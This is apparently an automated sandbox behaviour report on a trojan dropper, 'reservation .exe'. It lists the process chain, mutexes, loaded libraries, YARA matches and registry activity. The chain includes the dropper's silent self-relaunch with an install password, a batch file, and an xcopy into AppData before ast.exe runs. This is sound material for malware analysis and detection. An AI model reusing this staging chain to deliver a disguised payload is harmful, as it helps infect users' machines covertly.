                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6F6F4010_2_6B6F6F40
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6C773010_2_6B6C7730
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6EA79010_2_6B6EA790
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6CEEA010_2_6B6CEEA0
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6F75D010_2_6B6F75D0
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71BCF010_2_6B71BCF0
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6EDCD010_2_6B6EDCD0
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: String function: 6B6F06B0 appears 135 times
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: String function: 6B6F05D0 appears 162 times
                          Source: reservation .exeStatic PE information: invalid certificate
                          Source: reservation .tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: reservation .tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: reservation .exe, 00000000.00000003.2037832146.000000007FE26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs reservation .exe
                          Source: reservation .exe, 00000000.00000000.2035698643.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs reservation .exe
                          Source: reservation .exe, 00000000.00000003.2037382869.000000000272A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs reservation .exe
                          Source: reservation .exe, 00000003.00000003.2459283655.0000000002278000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs reservation .exe
                          Source: reservation .exeBinary or memory string: OriginalFileName vs reservation .exe
                          Source: reservation .exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engineClassification label: mal84.troj.evad.winEXE@16/63@1/2
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkslN63FF292C-2B60-4C63-A250-16B59EF35251
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeMutant created: \Sessions\1\BaseNamedObjects\3 @
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\02CC837A-11F4-4C58-AE40-A04E18FF470D7c
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeMutant created: \Sessions\1\BaseNamedObjects\U SVW3 E E E
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeMutant created: \Sessions\1\BaseNamedObjects\
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkwrN63FF292C-2B60-4C63-A250-16B59EF35251
                          Source: C:\Users\user\Desktop\reservation .exeFile created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmpJump to behavior
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""
                          Source: C:\Users\user\Desktop\reservation .exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873804671.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: reservation .exeString found in binary or memory: /LOADINF="filename"
                          Source: C:\Users\user\Desktop\reservation .exeFile read: C:\Users\user\Desktop\reservation .exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe"
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe"
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giuJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giuJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dbgcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: cscapi.dllJump to behavior
